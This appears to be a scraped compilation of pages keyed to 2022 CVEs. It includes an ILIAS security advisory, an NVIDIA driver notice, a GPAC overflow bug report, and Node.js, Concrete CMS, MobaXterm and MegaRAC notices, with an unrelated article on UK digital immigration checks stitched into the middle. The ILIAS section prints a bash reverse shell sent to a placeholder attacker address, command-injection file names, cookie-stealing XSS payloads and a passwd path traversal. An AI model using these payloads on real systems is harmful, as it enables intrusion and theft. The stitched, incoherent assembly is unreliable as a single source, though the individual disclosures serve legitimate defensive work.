ILIAS before 7.16 allows External Control of File Name or Path.

ILIAS is a common eLearning platform, published under an open source license. Version 7.14 is vulnerable to multiple critical vulnerabilities, ranging from XSS over LFI to command injection.

**Vendor description**

_"Around since 1998, ILIAS is a powerful learning management system that fulfills all your requirements. Using its integrated tools, small and large businesses, universities, schools and public authorities are able to create tailored, individual learning scenarios."_

Source: https://www.ilias.de/en/

**  
Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

**Vulnerability overview/description****1) Authenticated Direct OS Command Injection - CVE-2022-45915**

ILIAS utilizes several third-party programs to perform tasks like creating PDF files or scanning uploaded files for known viruses. These are called using the PHP exec() function. In several instances, the arguments passed to the exec() function contain user input that is not properly sanitized.

By performing malicious configuration steps or uploading dangerous files, an attacker can execute arbitrary system commands with the rights of the web server user (www-data). The privilege required for the different instances of command injection range from low rights to admin rights.

**2) Stored Cross-Site Scripting - CVE-2022-45916**

Multiple stored cross-site scripting vulnerabilities were identified in ILIAS course items. These were either achieved by bypassing existing XSS filters or simply by exploiting missing input validation altogether. This results in the execution of attacker-controlled JavaScript code by the user's browser.

The attacker requires the right to create course items, e.g., as a tutor of a course.

**  
3) Local File Inclusion - CVE-2022-45918**

The included SCORM editor features a debugger that gives authors insights into the current SCORM player session, as well as previous sessions. When accessing the logs of previous sessions, the debugger fails to validate the requested file path, allowing for arbitrary filesystem access.

**  
4) Open Redirect - CVE-2022-45917**

The function shib\_logout.php redirects the user to a URL specified in the "return" parameter. Since this parameter is not validated, an attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in phishing campaigns, as it allows hiding the malicious webpage behind a link that looks like it would take you to the real ILIAS webpage.

**Proof of concept****1) Authenticated Direct OS Command Injection - CVE-2022-45915**

Multiple instances of command injection vulnerabilities were identified:

****a) ZIP archive upload****

Normal users with open assessments can submit their solution by uploading a ZIP archive. These archives are extracted on the server and scanned for viruses recursively. The directory and file names can be used by an attacker to inject system commands, e.g., by including a directory with the name $(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker is able to get a reverse shell on the ILIAS webserver with the rights of the web server user (www-data).

****b) Media object creation****

ILIAS can be configured so that users can create media objects based on files inside an "Upload Directory". Before these objects are created, the files are scanned for viruses. The file names can be used by an attacker to inject system commands. By placing a file with a name like $(touch /tmp/pwned) inside the upload directory and then creating a media object based on it, an attacker is able to execute arbitrary system commands with the rights of www-data on the server.

****c) PDF document creation****

ILIAS provides users the functionality to export content as PDF files. A user with admin rights can configure the path to the preferred PDF renderer. An attacker can use this parameter to inject system commands. Due to missing input validation it is possible to inject multiple commands. The path to wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By changing the path to:

    /usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects to the attacker's machine on port 13373. The reverse shell is initiated when the export function is triggered. No PDF renderer has to be installed for this vulnerability to be exploitable.

**2) Stored Cross-Site Scripting - CVE-2022-45916**

Multiple instances of stored cross-site scripting were identified:

****a) Several Stored XSS Attacks in Tests****

An attacker must be able to create new tests in which the JavaScript code will be embedded. If a victim then later accesses one of those tests, the XSS payload will be triggered. The "Question" input field of a test has a filter in place, which correctly removes HTML tags such as <script> or <img src="x" onerror="alert(document.cookie)">. By making use of half open HTML tags, this filter can be successfully bypassed. E.g.

    <img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test to trigger an XSS. It's important to end the JavaScript code with a quotation mark or space, to properly separate it from successive HTML tags, after it's embedded into a test. Finally, the "Question" input field of the question type "Long Menu" was identified to use no filtering at all, resulting in the unrestricted use of arbitrary HTML tags such as <script>.

**  
**b) Stored XSS in title of course items****

An attacker with rights to create an arbitrary course item can conduct a stored XSS attack by setting the title of the element to:

    " onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is triggered.

****c) Stored XSS in HTML sites****

An attacker with rights to edit an HTML Learning Module can conduct a stored XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even if this behavior is intended, it is insecure and considered bad practice.

**  
**3) Local File Inclusion - CVE-2022-45918****

As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS platform. An attacker with access to a SCORM player can open the SCORM debugger and request the logs of a previous session. By changing the value of the "logFile" query parameter of the request, they can read arbitrary files of the server's filesystem. For example, to read the passwd file on Linux systems, an attacker can change the value of the parameter logfile to

    "../../../../../../../../../etc/passwd"

****4) Open Redirect - CVE-2022-45917****

The shib\_logout function is vulnerable to an open redirect. A URL that successfully uses this vulnerability to redirect to "https://www.sec-consult.com" is:

    http:// ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

**Vulnerable / tested versions**

The vulnerabilities were identified in ILIAS version 7.14.

However, a brief analysis of the source code suggests, that several vulnerabilities are present in versions dating back to at least 3.8.4. Hence it is assumed that most current versions of the product are affected. The vulnerabilities were partly fixed in version 7.15, a complete patch is available with version 7.16.

**Vendor contact timeline**

CVE-2022-45918: Multiple critical vulnerabilities in ILIAS eLearning platform

Piotr Bania of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered two memory corruption vulnerabilities in shader functionality of an NVIDIA driver.
NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC. They are used to communicate between the operating system and the GPU device. This

Tuesday, December 6, 2022 11:12

_Piotr Bania of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered two memory corruption vulnerabilities in shader functionality of an NVIDIA driver.

NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC. They are used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

Two exploitable memory corruption vulnerabilities exist in the NVIDIA graphics driver: TALOS-2022-1603 (CVE-2022-34671) and TALOS-2022-1604 (CVE-2022-34671). An attacker can use arbitrary code execution to trigger these vulnerabilities. These vulnerabilities could also potentially be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox, etc.) in order to perform guest-to-host escape.

Cisco Talos worked with NVIDIA to ensure that these issues were resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update this affected product as soon as possible: NVIDIA D3D10 Driver, Version 516.94 , 31.0.15.1694. Talos tested and confirmed this version of the NVIDIA could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60606-60607 and 60611-60612. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: NVIDIA driver memory corruption vulnerabilities discovered

The UK's use of technology to enforce its hard-line immigration policy brings the border into every facet of migrants' lives.

In 2019, Anna moved from Poland to the UK with her partner and three children. Soon after they settled into their home and new life, he became violent. Anna attempted to leave, taking their children with her. But when she contacted her local council’s social services, they asked her about her immigration status. There was a problem.

Anna—a pseudonym, for privacy and safety reasons—had a valid visa under the EU Settlement Scheme (EUSS), which required European citizens to register with the British immigration authorities after Britain voted to leave the EU in 2017. But when she tried to prove it, she couldn’t. She had never received a text message or a physical letter saying that she had settled status. Anna went back into the household with her children and her abuser, with nowhere else to go.

When Anna got in touch with the immigration authorities, they put her through to a technical team that, she says, rarely called her back and seemed to constantly be too busy, with long waiting times. Once she got through to the helpline, they confirmed that she had made a valid application (and that her children had settled status, so they had the right to remain in the UK). But they couldn’t give her access to her account. Without it, she couldn’t generate a sharecode—digital proof of her immigration status that would allow her to access social services, get a job, or rent an apartment.

After another serious incident, the police finally gave her abuser an injunction. Anna left the house, but she lost a job offer because she couldn’t prove her immigration status. She couldn’t apply for benefits because she didn’t have proof that she was also actively working. In March 2022, she received confirmation through a charity that was helping her that she had presettled status. But she still hasn’t been contacted by the UK’s Home Office directly—and still has no access to her sharecode.

Anna’s story is shocking. But as the UK’s immigration and policing agency, the Home Office, emphasizes a “digital-by-default” approach to border management, these stories are becoming increasingly common. Earlier this year, the Home Office released its “New Plan for Immigration,” which laid out the increasing digitization of the UK’s immigration system. “We will have a seamless, fully digital, end-to end journey for customers interacting with the immigration system by 2025,” the Home Office said in its plan. 

Currently, migrants and people applying for new visas in the UK are encouraged to use an app to submit their biometrics, including scans of their face; to fill out forms online; and to prove their immigration status with sharecodes. Technology is playing a larger role in immigration systems around the world, affecting the ways borders can be enforced in a physical space and borders and immigration status are maintained once people enter a country. For migrants, this increasing digitization of the immigration system makes it possible for the border to be anywhere and everywhere, spreading into all corners of their lives. 

A Hostile Environment

Public interest in migration is significant in the UK, with more than 50 percent of Britons polled saying it was one of the most important issues facing the union. The Home Office has made multiple justifications for its move to digital status: that it will be better for older people who won’t have to keep track of a piece of paper, that it could enhance security for vulnerable people who might otherwise have their documents taken away by nefarious actors (for example, traffickers or exploitative employers), and that there will be sufficient time for people to fully transition to digital status. But campaigners, organizations, and lawyers working with migrant communities around the UK say these digital systems are already rife with problems, many of which will only get worse.

“Do we have an immigration system that treats people as full humans, that is responsive to people’s circumstances and is based on common sense?” asks Mary Atkinson of the Joint Council for the Welfare of Immigrants, a UK-based nonprofit. “A digital system might work to make the system that it’s implementing quicker, but there will always be problems, glitches that cause anguish and real pain.” 

In 2012, then-home secretary Theresa May announced that the UK’s immigration policy would be geared toward making the UK a “hostile environment” for immigrants. If you didn’t have regularized immigration status (such as a visa or a settlement route), the UK would become such a difficult place to live that you would leave of your own volition. As part of this plan, more and more people were tasked with checking immigration status—from landlords to bank clerks, teachers, university lecturers, and doctors—to ensure that people could access services.

These types of checks have played a role in a host of problems, including the Windrush scandal.  Academics and activists have noted that it has become relatively easy for people to slip through the cracks of legal status, making them vulnerable to removal or detention. Since May, there have been five home secretaries, all of whom have repeatedly emphasized their desire to reduce immigration to the UK (even when these plans draw condemnation from the UN and other international bodies). The most recent, Suella Braverman (who was in the post for 40 days, fired for a security breach, and then reinstated a week later), courted controversy for saying that it was her dream to see refugees to the UK deported to Rwanda. Those in the sector say Braverman is just as hard-line as her predecessor, Priti Patel—if not more so. 

What this means in practice is that people’s information and proof of immigration status are kept on databases owned and operated by the Home Office. The first example of this was the EUSS, but other visa routes are going the same way—such as the Graduate Route visa, which was introduced last year and which people apply for with an app, and the Ukraine Family Scheme, which was introduced earlier in 2022 for people fleeing the conflict in Ukraine. If you’re approved to remain under these conditions, when you apply for a job or try to open a bank account, you will be asked to generate a sharecode that your employer or a bank employee or a police officer can input into their end of the Home Office database to verify your status. 

“We’re at the beginning of a widespread conversation about data collection, and we see that the Home Office has no accountability,” says Andreea Dimitrsou, who works at the 3million, a campaign group in the UK that advocates for the rights of EU citizens living in the UK.

People working in the sector, particularly with migrant communities, have countless stories of the way that digital-by-default systems are affecting their clients. “We have real concerns about the digital hostile environment,” says Julia Tinsley-Kent of Migrants Rights Network, an NGO. “If people are buying data packages to prove their visa status—that’s a worry, especially with the cost of living. There are risks of harm that haven’t been properly investigated—security issues, people being able to see other people’s statuses erroneously, system failures.”

In 2019, the Home Office announced the Status Checking Project, a centralized database that made it possible for migrants to prove their status. Immigrant rights campaigners and members of parliament at the time called it “seriously concerning,” both because of the scale of data collected and the seeming lack of safeguards in place. As a result of the nature of the UK’s immigration system, where people who aren’t border guards are tasked with checking immigration status, the digitization of these services has wide-reaching impacts.

“It’s a good idea for the government to be thinking about this, and the government should be taking initiative around digitization,” says Joe Tomlinson, a lecturer at the University of York who has carried out extensive research into automation in the UK’s immigration system. “My concern is that they’re not doing it very well.” Tomlinson and fellow researcher Jed Meers recently released a paper after surveying 200 landlords about their willingness to use a digital immigration checking service when renting to prospective tenants. They found that an applicant whose name didn’t sound “British” but who had a British passport had an 87 percent chance of being accepted as a tenant. However, if this prospective tenant only had digital proof of immigration status, they had a 13 percent chance of being accepted as a tenant—with the digital status taking precedence over factors like employment, age, and gender.

The EUSS has increasingly become a testing ground for some of these issues. “You bake problems into the way that systems are built,” says Tomlinson. “You can have something that looks like it’s producing outcomes, but the procedural systemic flaws happen, and you get situations like what’s happening with the EUSS.” As of June 2022, more than 5.83 million people had applied to the EUSS, with 5.4 million of those granted status. (The Home Office told WIRED in a statement that the total number of people granted status is now 5.9 million.)  But since the program opened in June 2020, the number of people waiting more than 18 months for a decision has grown too, and data breaches are reported frequently.

Vivian, a researcher at a higher education institution who asked not to be identified for privacy reasons, says that knowing she would only have digital proof of her immigration status under the EUSS made her worried. “When my partner and I were renewing our mortgage, the bank really scrutinized our digital immigration status. They realized that my name had been recorded properly, with my first name and then my last name, and then my partner’s was recorded with his last name first. So they blocked our mortgage application,” she says “We faced a wall in trying to solve this problem, and we kept getting through to people on the Home Office helpline who said, ‘Look, we’ve taken notice of this but we can’t do anything.’”

Their frustration grew, and instability in the British economy caused Vivian and her partner even more stress. Eventually, they were able to solve the issue by writing a letter to the bank and emphasizing that they were both in full-time employment by large institutions. But Vivian says that she knows they got lucky. ”Essentially, someone at the bank decided to let it go. But what if our status had been harder to read? Or if we were self-employed?”

In a statement, the Home Office defended EUSS as an “overwhelming success” and said it has measures in place when its technology fails to function.

 “Our digital services are rigorously tested and designed to be highly resilient and, as with any major digital program, we have contingency measures in place should issues occur,” the Home Office said. “If individuals experience technical issues, they are still able to evidence their rights by gaining support from our resolution center, available seven days a week.”

Even within migrant communities, there are differences in access. The 3million submits reports to the Independent Monitoring Authority, which monitors the post-Brexit rights of EU and EEA citizens, who theoretically are able to use this information in stakeholder consultations. For non-EU migrants, there are precious few other avenues or bodies that can advocate for them, except for individual charities and NGOs, many of which are already overstretched.

Right-to-work checks for migrants have been in place since 1996—on the Home Office website, it still says that you can check people’s original documents if they don’t have a sharecode. People with pending visas can work on the basis of their previous work conditions, but few employers seem to understand this, and many worry they’ll be penalized. Elisa, who is Polish and has settled status, has been waiting to take up employment for a month because she can’t access her sharecode. Her job is with the National Health Service, and while her employer is understanding, she’s worried about how much longer this will go on. 

“The digital systems are a total failure,” says Ake Achi, who cofounded Migrants at Work, an organization challenging right-to-work checks in the UK. “People are falling into these gaps because there’s nothing to protect us.”

Paper Thin

In 2019, the Home Office set up its Digital, Data & Technology team—its 2024 strategy emphasized that the digitization of the immigration system was already significantly underway—for example, the “Person Centric Data Platform” provides “a single view of individuals to around 700 services, and this single view is crucial to the protection of our borders.” In 2021, it was revealed the Home Office was “hoarding data” on 650 million people, with very few safeguards. Even more recently, the Home Office was told to stop using an automated decision-making algorithm for short-term visas after a legal challenge, which seemed to indirectly discriminate against people from certain nationalities—such as Pakistan or Nigeria—by labeling these countries as “riskier.” 

For people whose immigration status is not as cut and dry—for example, asylum seekers—these digital systems pose challenges too. For a while, Border Force officials and Home Office staff who were monitoring the arrival of asylum seekers to the UK via the Channel were illegally seizing their phones and extracting data from it. Privacy International, which is mounting a legal challenge over this policy, said that the policy was “in line with this government’s (and many others’) efforts to criminalize migration and rob migrants of their basic human rights.” 

People who are on immigration bail and classified as high risk have to wear GPS ankle monitors, which track where they are 24/7. Those who are classified as low risk may soon have to start wearing “smartwatches” with “facial recognition capabilities,” although it’s unclear whether this technology already exists.

“They have the right to use the data accrued from GPS monitoring—to look at that data anonymously, to understand the impact, looking where people have been frequenting and using that to carry out enforcement activity,” says Rudy Schulkind of Bail for Immigration Detainees. “It’s quite a stigmatizing and degrading thing to put people through, and we don’t know where that data is going to go. It’s got incredibly worrying implications for allowing this kind of technology to be normalized.”

Campaigners and organizers in the sector point out some immediate potential fixes to the digitization of the UK’s hostile environment. “Digitization follows substantive policy priorities,” says Tomlinson. “But just because policy is digital-first doesn’t mean it has to be digital-only. Giving people the option to also have a paper record would make some kind of difference.” Organizations like JCWI have campaigned for people to be given paper records of their visa status. Others have emphasized that the Home Office should put up a data firewall between immigration enforcement authorities and police in cases where a victim is vulnerable—currently, the police refer 204 victims per month to immigration enforcement, including victims of human trafficking and labor exploitation.

In the US, digital systems are a significant part of how Immigration and Customs Enforcement (ICE) teams carry out raids on communities. In Canada, a new automated decision-making tool is increasingly being tested on asylum and immigration applications. In the EU, a massive biometric database—which will be used for migration purposes, among others—is set to become the largest police biometrics database in the world, despite concerns from rights advocates and organizations. Digital-by-default immigration systems are slowly becoming the norm. But in many senses, they exacerbate existing issues with the systems that they work within. 

“There’s a reality in which somewhere up to a million of our fellow citizens are too scared to rent a safe home or to seek help from the police when they’re facing domestic abuse, to get a Covid vaccine, and that’s a big result of the hostile environment, whether it’s digital or not,” says Atkinson. “The ‘Papers, please’ society which this has created exists whether it’s on an app that you’re showing to your landlord or on a piece of paper.”

The Dangerous Digital Creep of Britain's ‘Hostile Environment’

GPAC MP4box v2.0.0 was discovered to contain a stack overflow in the smil_parse_time_list parameter at /scenegraph/svg_attributes.c.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

A fixed length buffer value\_string is allocated in smil\_parse\_time\_list, while in the later memcpy, it doesn't check the length and simply copy content to this buffer, causing overflow.

static void smil\_parse\_time\_list(GF\_Node \*e, GF\_List \*values, char \*begin\_or\_end\_list)
{
	SMIL\_Time \*value;
	char value\_string\[500\];
	char \*str = begin\_or\_end\_list, \*tmp;
	u32 len;

	/\* get rid of leading spaces \*/
	while (\*str == ' ') str++;

	while (1) {
		tmp = strchr(str, ';');
		if (tmp) len = (u32) (tmp-str);
		else len = (u32) strlen(str);
		memcpy(value\_string, str, len);
		while ((len > 0) && (value\_string\[len - 1\] == ' '))

**Impact**

Since the content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary, causing DoS or even Remote Code Execution.

**Mitigation**

We can just set a length limit to it, making it less than 500 byte.

**Reproduce**

On Ubuntu 22.04 lts, make with this.

    ./configure --static-bin
    make
    

Run the following command with POC.svg.

    MP4Box -mp4 -sync 0x1000 ./POC.svg
    

You may get a buffer overflow detected error.

    [Parser] SVG Scene Parsing: ../encode_2-gpac-2.0.0/out/default/crashes/0.svg
    *** buffer overflow detected ***: terminated               | (00/100)
    Aborted
    

GDB info before crash

    ─────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────
     RAX  0x6804
     RBX  0x0
     RCX  0x1f4
     RDX  0x6804
    *RDI  0x7fffffff6640 ◂— 0x0
     RSI  0xda20cc ◂— 0xff22802d68353548
     R8   0x0
     R9   0xda08b0 ◂— 0x0
     R10  0xda2050 ◂— 0x1790
     R11  0xd80c00 (main_arena+96) —▸ 0xdabcf0 ◂— 0x0
     R12  0xda08b0 ◂— 0x0
     R13  0x7fffffff6640 ◂— 0x0
     R14  0xda20cc ◂— 0xff22802d68353548
     R15  0xb650c3 ◂— 'wallclock('
     RBP  0x6804
     RSP  0x7fffffff6600 ◂— 0x0
    *RIP  0x4c756b (smil_parse_time_list+123) ◂— call   0xadfe30
    ──────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────
       0x4c77e2 <smil_parse_time_list+754>    jmp    smil_parse_time_list+110                      <smil_parse_time_list+110>
        ↓
       0x4c755e <smil_parse_time_list+110>    mov    edx, ebp
       0x4c7560 <smil_parse_time_list+112>    mov    ecx, 0x1f4
       0x4c7565 <smil_parse_time_list+117>    mov    rsi, r14
       0x4c7568 <smil_parse_time_list+120>    mov    rdi, r13
     ► 0x4c756b <smil_parse_time_list+123>    call   __memcpy_chk                      <__memcpy_chk>
            dstpp: 0x7fffffff6640 ◂— 0x0
            srcpp: 0xda20cc ◂— 0xff22802d68353548
            len: 0x6804
            dstlen: 0x1f4
    

Backtrace

    pwndbg> bt
    #0  0x0000000000a84c3c in pthread_kill ()
    #1  0x0000000000a640d6 in raise ()
    #2  0x0000000000402136 in abort ()
    #3  0x0000000000a7b476 in __libc_message ()
    #4  0x0000000000adfe2a in __fortify_fail ()
    #5  0x0000000000adfc46 in __chk_fail ()
    #6  0x00000000004c7570 in smil_parse_time_list ()
    #7  0x00000000004c965b in gf_svg_parse_attribute ()
    #8  0x000000000063d178 in svg_node_start ()
    #9  0x0000000000463486 in xml_sax_node_start ()
    #10 0x0000000000464629 in xml_sax_parse ()
    #11 0x0000000000464e63 in xml_sax_read_file.part ()
    #12 0x000000000046515e in gf_xml_sax_parse_file ()
    #13 0x000000000063b80a in load_svg_run ()
    #14 0x000000000042a5e8 in EncodeFile ()
    #15 0x000000000041252c in mp4boxMain ()
    #16 0x0000000000a598fa in __libc_start_call_main ()
    #17 0x0000000000a5b157 in __libc_start_main_impl ()
    #18 0x0000000000402b95 in _start ()
    

**Credit**

xdchase

**POC**

POC-bof.zip

CVE-2022-45283: GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in smil_parse_time_list · Issue #2295 · gpac/gpac

Buffer overflow in firmware lewei_cam binary version 2.0.10 in Force 1 Discovery Wifi U818A HD+ FPV Drone allows attacker to gain remote code execution as root user via a specially crafted UDP packet. Please update the Reference section to these links > http://thiscomputer.com/ > https://www.bostoncyber.org/ > https://medium.com/@meekworth/exploiting-the-lw9621-drone-camera-module-773f00081368

CVE-2022-40918: Exploiting the LW9621 Drone Camera Module - meekworth - Medium

An access control issue in MobaXterm before v22.1 allows attackers to make connections to the server via the SSH or SFTP protocols without authentication.

An access control issue in MobaXterm before v22.2 allows attackers to make connections to the server via SSH or SFTP protocols without authentication

**Description**

When using the default configuration, MonaXterm < v22.2, does not roperly check for the remote server host key when starting SFTP or SSH sessions.

This can result in man in the middle attacks, because the fingerprint on the first connection attempt is automatically accepted.

Note

Further fingerprint changes result in a warning and the user is informed about a potential man in the middle attack.

Du due an information leak from the PuTTY based ssh client, it’s possible for the server to check if the client already knwos the fingerprint or not. This allows an man in the middle attacker to intercept only new connection and avoid clients wich would show an error about chnaged fingerprints.

The default configuration also forwards the ssh agent, wich allows the man in the middle attacker to abuse the forwarded agent to login to other remote servers.

This vulnerability was discovered by **AUT-milCERT** during an audit of MobaXterm.

**Mitigation**

Update MobaXterm to version >= v22.2

**Release Notes v22.2**

*   **Bugfix:** properly check for the remote server host key when starting SFTP sessions
    

**References**

*   https://mobaxterm.mobatek.net/download-home-edition.html

CVE-2022-38336: CVSS N/A CVE-2022-38336 — SSH-MITM

A OS Command Injection vulnerability exists in Node.js versions <14.21.1, <16.18.1, <18.12.1, <19.0.1 due to an insufficient IsAllowedHost check that can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid before making DBS requests allowing rebinding attacks.The fix for this issue in https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32212 was incomplete and this new CVE is to complete the fix.

Updates are now available for v14,x, v16.x, v18.x and v19.x Node.js release lines for the following issues.

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution.

Impacts:

*   All versions of the v18.x and v19.x releases lines.

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the . character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service).

In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.

OpenSSL versions 3.0.0 to 3.0.6 are vulnerable to this issue.

Impacts:

*   All versions of the v18.x and v19.x releases lines.

The Node.js rebinding protector for --inspect still allows invalid IP address, specifically, the octal format. An example of an octal IP address is 1.09.0.0, the 09 octet is invalid because 9 is not a number in the base 8 number system. Browsers such as Firefox (tested on latest version m105) will still attempt to resolve this invalid octal address via DNS. When combined with an active --inspect session, such as when using VSCode, an attacker can perform DNS rebinding and execute arbitrary code

Thank you to @haxatron1 for reporting this vulnerability.

Impacts:

*   All versions of the v14.x, v16.x, v18.x, and v19.x releases lines.

**Downloads and release details**

*   Node.js v14.21.1 (LTS)
*   Node.js v16.18.1 (LTS)
*   Node.js v18.12.1 (LTS)
*   Node.js v19.0.1 (Current)

It's taking us a bit longer than originally expected and the Node.js Security Releases will be available on, or shortly after, Friday, November 4th, 2022.

The Node.js project will release new versions of the 14.x, 16.x, 18.x, 19.x releases lines on or shortly after Thursday, November 3, 2022 in order to address:

*   One medium severity issues.
*   Two high severity issues that affect OpenSSL as per secadv/20221101.txt

These security releases are driven by the OpenSSL security release as announced in OpenSSL November Security Release as well as an additional vulnerability that affects all supported release lines.

The 19.x release line of Node.js is vulnerable to one medium severity issue and two high severity issues.

The 18.x release line of Node.js is vulnerable to one medium severity issue and two high severity issues.

The 16.x release line of Node.js is vulnerable to one medium severity issue.

The 14.x release line of Node.js is vulnerable to one medium severity issue.

Releases will be available on, or shortly after, Thursday, November 3rd, 2022.

The current Node.js security policy can be found at https://nodejs.org/en/security/. Please follow the process outlined in https://github.com/nodejs/node/blob/master/SECURITY.md if you wish to report a vulnerability in Node.js.

Subscribe to the low-volume announcement-only nodejs-sec mailing list at https://groups.google.com/forum/#!forum/nodejs-sec to stay up to date on security vulnerabilities and security-related releases of Node.js and the projects maintained in the nodejs GitHub organization.

CVE-2022-43548: Nov 3 2022 Security Releases | Node.js

Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to XSS in the text input field since the result dashboard page output is not sanitized. The Concrete CMS security team has ranked this 4.2 with CVSS v3.1 vector AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N Thanks @_akbar_jafarli_ for reporting. Remediate by updating to Concrete CMS 8.5.10 and Concrete CMS 9.1.3.

**8.5.10 - 8.5.12**

_8.5.11 and 8.5.12 had fixes for PHP 5.5 compatibility_

**Bug Fixes**

*   Fix ZendCacheDriver does not set lifetime properly (thanks hissy)
*   Made the legacy\_salt functionality easier to read

**Developer Updates**

*   Private properties in Select Attribute Controller updated to be protected (thanks biplobice)
*   Added on_get_page_wrapper_class() custom event to allow developers to customize classes delivered by this method (thanks JohnTheFish)

**Security Fixes**

See our security release blog post for more information about security fixes.

**Medium**

*   CVE-2022-43693 Added "state" parameter to OAuth client by default to prevent CSRF. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43692 Sanitized output to prevent XSS in dashboard search pages. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43694 Sanitized output in API endpoint to prevent potential reflected XSS in the Image Manipulation Library. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43967 Sanitized output in multilingual dashboard report to prevent reflected XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43968 Sanitized output on the icons dashboard page to prevent reflected XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43686 Improved performance of "forever" cookie to prevent DOS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43691 Hide $_SERVER and $_ENV output from whoops by default to prevent information disclosure. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43687 Generate a new session ID when authenticating through OAuth to prevent session fixation. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43556 Sanitized dashboard breadcrumbs to prevent stored XSS. Thanks @\_akbar\_jafarli\_for reporting HackerOne report #1696363.

**Low**

*   CVE-2022-43695 Sanitized entity names in entity association dashboard page to prevent stored XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43690 Use strict comparison when testing against legacy password algorithm to prevent against potential integer conversion. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43688 Sanitize Microsoft tile icon to prevent stored XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43689 Disable entity expansion when sanitizing SVGs to prevent DNS based IP disclosure. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.

**Not Ranked**

*   Added a warning for admins when they are potentially giving more access than they expect when they set certain advanced permissions. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for suggesting.
*   Added a warning when moving groups that permissions of the new parent group will be granted to the child group but the child group will retain all previous permissions.Thanks Bogdan and Adrian Tiron from FORTBRIDGE for suggesting.

CVE-2022-43556: 8.5.10-12 Release Notes :: Concrete CMS

AMI MegaRAC Redfish Arbitrary Code Execution

**BMC&C**

Eclypsium Research has discovered and reported 3 vulnerabilities in AMI MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers that are known to have used MegaRAC BMC include but are not limited to the following: 

AMD

Ampere Computing

ASRock

Asus

ARM

Dell EMC

Gigabyte

Hewlett-Packard Enterprise

Huawei

Inspur

Lenovo

NVidia

Qualcomm

Quanta

Tyan

The BMC&C vulnerabilities range in severity from Medium to Critical, including remote code execution and unauthorized device access with superuser permissions. The vulnerabilities can be exploited by remote attackers having access to remote management interfaces (Redfish, IPMI). Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project.

